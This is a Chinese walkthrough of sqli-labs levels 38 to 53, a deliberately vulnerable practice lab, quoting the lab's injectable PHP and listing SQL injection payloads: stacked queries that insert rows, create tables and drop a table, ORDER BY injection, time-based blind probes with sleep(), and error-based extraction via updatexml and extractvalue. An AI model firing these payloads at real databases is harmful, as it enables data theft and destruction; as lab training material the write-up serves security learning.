第三十八关:堆叠注入

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{ /* store first result set */
if ($result = mysqli_store_result($con1))
{
if($row = mysqli_fetch_row($result))
{
echo '<font size = "5" color= "#00FF00">';
printf("Your Username is : %s", $row[1]);
echo "<br>";
printf("Your Password is : %s", $row[2]);
echo "<br>";
echo "</font>";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
//printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
/* close connection */
mysqli_close($con1);

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。所以有了堆叠注入。

当然这关,直接用?id=100'union select 1,user(),3--+就可以看到你想看的了。但是这里是练堆叠注入。

payload(向users表中新增数据):

?id=1';insert into users(id,username,password) values('38','less38','38')--+

第三十九关:相比于38关少了一个单引号而已

payload:

?id=1;insert into users(id,username,password) values('39','less39','39')--+

第四十关

payload:

?id=1');insert into users(id,username,password) values('40','less40','40')--+

第四十一关

跟39关的payload一样,不同于39关的是,这一关是盲注,没有报错信息。

第四十二关

login.php

function sqllogin($host,$dbuser,$dbpass, $dbname){
// connectivity
//mysql connections for stacked query examples.
$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname); $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

我们可以看到username是经过mysqli_real_escape_string的转义的,那么就可以从password处进行attack。

用户名随意,密码如下:

1';create table less42 like users#
1';insert into users(id,username,password) values('42','less42','42')#

创建了一个名为less42的表以及写入一条数据

当然,也可以进行删除表的操作1';drop table less42#

第四十三关

这关就是42关的单引号变为单引号加右括号而已,其他的基本没变。

第四十四关

这关跟42关的区别是,这一关是盲注,没有报错信息,其他的一毛一样。

第四十五关

这关与43关的区别是,盲注!!!没有报错信息。

第四十六关:order by注入

$sql = "SELECT * FROM users ORDER BY $id";
?sort=1 asc  //升序排列
?sort=1 desc //降序排列

从上面两个语句的结果可以看出注入点在order by后面的参数中,order by注入不同于where后的注入,其不能使用union等进行注入。

?sort=rand(true)
?sort=rand(false)

上面两个语句返回的不一样,且两个语句各自返回的都是固定的。所有就可以尝试报错注入。

下面是?sort=rand(true)的回显页面:

下面是?sort=rand(false)的回显页面:

‘s'的ascll码为115。所以有了以下的语句:

?sort=rand(ascii(substr(database(),1,1))=115)

回显页面与rand(true)的回显页面一样,所以可以理解为ascii(left(database(),1))=115=true。

当然也可以用其他的报错注入语句:

?sort=rand(left(database(),1)='s')
?sort=rand(left(database(),2)='se')

延时注入:

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(5),1)
?sort=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1)

updatexml:

?sort=1 and updatexml(1,concat(0x23,database()),1)

procedure analyse参数后注入:

?sort=1 procedure analyse(extractvalue(1,concat(0x23,database())),1)

第四十七关

$sql = "SELECT * FROM users ORDER BY '$id'";

在46关的基础上多了一个单引号

?sort=1' and updatexml(1,concat(0x23,database()),1)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+

第四十八关

相比于46关,就是报错注入不能使用,因为没有错误回显,其他的都可以使用。

延时注入和rand(sql语句)还可以使用。

第四十九关

同48关,这一关是47关的盲注类型,大致情况和48关差不多,报错注入不能使用。

第五十关

?sort=1;create table less50 like users

大致和42关差不多。

第五十一关

相比于50关,多了一个单引号,并且需要将后面的单引号给注释掉。

?sort=1';create table less51 like users--+

第五十二关

同50关,只是mysql的错误不会在页面上显示了,利用方法同50关。

第五十三关

同51关,只是mysql的错误不会在页面上显示了,利用方法同51关。

sqli-labs之Page-3的更多相关文章

  1. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  2. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  3. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

  4. Sqli labs系列-less-1 详细篇

    要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...

  5. SQL注入系列:SQLi Labs

    前言 关于注释 说明:在SQL中--[空格]表示注释,但是在URL中--空格在发送请求的时候会把最后的空格去掉,所以用--+代替,因为+在被URL编码后会变成空格 MYSQL有三种常用注释: --[空 ...

  6. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  7. SQLI LABS Challenges Part(54-65) WriteUp

    终于到了最后一部分,这些关跟之前不同的是这里是限制次数的. less-54: 这题比较好玩,10次之内爆出数据.先试试是什么类型: ?id=1' and '1 ==>>正常 ?id=1' ...

  8. SQLI LABS Stacked Part(38-53) WriteUp

    这里是堆叠注入部分 less-38: 这题啥过滤都没有,直接上: ?id=100' union select 1,2,'3 less-39: 同less-38: ?id=100 union selec ...

  9. SQLI LABS Advanced Part(23-37) WriteUp

    继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...

  10. Sqli labs系列-less-5&6 报错注入法(下)

    我先输入 ' 让其出错. 然后知道语句是单引号闭合. 然后直接 and 1=1 测试. 返回正常,再 and 1=2 . 返回错误,开始猜表段数. 恩,3位.让其报错,然后注入... 擦,不错出,再加 ...

随机推荐

  1. shiro:集成Springboot(六)

    1:导入相关依赖 <!--thymeleaf 模板引擎依赖包--> <dependency> <groupId>org.springframework.boot&l ...

  2. Springboot:thymeleaf模板(八)

    存放位置:resources\templates 访问方式:通过Controller请求访问,不可直接访问(相当于web项目的WEB-INF目录) 环境依赖: <!--thymeleaf模板支持 ...

  3. 解决利用hibernate连接mysql时无法插入汉字的问题

    1.先修改mysql数据库的配置文件my.ini,此文件放在mysql安装文件的根目录下.找到default-character-set属性,并将其值更改为utf8(不是utf-8),将default ...

  4. form表单里的button调用js函数

    近来发现一个特别奇怪的问题:在form表单里,button的onclick事件无法调用js函数.代码如下(这段代码放在form标签里): dropUpdateAddress调用的js函数为: 这个时候 ...

  5. Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework

    官方给出的描述是Spring框架中报告了一个与静态资源处理相关的目录遍历漏洞.某些URL在使用前未正确加密,使得攻击者能够获取文件系统上的任何文件,这些文件也可用于运行SpringWeb应用程序的进程 ...

  6. java中ThreadLocal的使用

    文章目录 在Map中存储用户数据 在ThreadLocal中存储用户数据 java中ThreadLocal的使用 ThreadLocal主要用来为当前线程存储数据,这个数据只有当前线程可以访问. 在定 ...

  7. TensorFlow框架 入门笔记

    背景 略 基础 介绍 略 TensorFlow安装 link TensorFlow 主要概念 使用图(graph)来表示计算任务(执行流程). 在被称之为会话(session)的上下文(context ...

  8. Vs Code中炫酷写代码插件Power Mode的安装配置

    扩展栏搜索 Power Mode 安装 安装后重启vs code 文件->首选项->设置 搜索setting.json,点击在setting.json中编辑 打开之后在右侧用户设置里添加以 ...

  9. 关于IE8上传文件的一些问题

    问题1: IE8下上传完文件后,对后台返回的JSON格式的数据,浏览器提示了下载该文件. 原因是因为IE8还不支持'application/json"类型的响应. 解决方法将后台返回的JSO ...

  10. shell之路 shell核心语法【第三篇】运算

    Bash 支持很多运算符,包括算数运算符.关系运算符.布尔运算符.字符串运算符和文件测试运算符. 原生bash不支持简单的数学运算,默认都是字符串操作,但是可以通过其他命令来实现 算数运算 expr. ...